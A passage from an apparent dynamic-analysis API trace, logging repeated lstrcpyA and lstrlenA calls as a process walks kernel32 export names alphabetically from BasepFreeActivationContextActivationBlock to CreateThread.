lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.801] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.801] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.801] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.801] lstrlenA (lpString="BEEP") returned 4 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.801] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.801] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.801] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.801] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.801] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.801] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.801] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.801] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.801] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.801] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.801] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.802] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.802] lstrlenA (lpString="CANCELIO") returned 8 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.802] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.802] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.802] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.802] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.802] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.802] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.802] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.802] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.802] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.802] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.802] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.802] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.802] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.802] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.802] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.802] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.802] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.802] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.802] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.803] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.803] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.803] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.803] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.803] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.803] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.803] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.803] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.803] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.803] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.803] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.803] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.803] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.803] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.803] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.803] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.803] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.803] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.803] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.803] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.804] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.804] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.804] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.804] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.804] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.804] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.804] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.804] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.804] lstrlenA (lpString="COPYFILEA") returned 9 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.804] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.804] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.804] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.804] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.804] lstrlenA (lpString="COPYFILEW") returned 9 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.804] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.804] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.804] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.804] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.804] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.804] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.805] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.805] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.805] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.805] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.805] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.805] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.805] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.805] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.805] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.805] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.805] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.805] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.805] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.805] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.805] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.805] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.805] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.805] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.805] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.805] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.806] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.806] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.806] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.806] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.806] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.806] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.806] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.806] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.806] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.806] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.806] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.806] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.806] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.806] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.806] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.806] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.806] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.806] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.806] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.807] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.807] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.807] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.807] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.807] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.807] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.807] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.807] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.807] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.807] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.807] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.807] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.807] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.807] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.807] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.807] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.807] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.807] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.807] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.807] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.808] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.808] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.808] lstrlenA (lpString="CREATETHREAD") 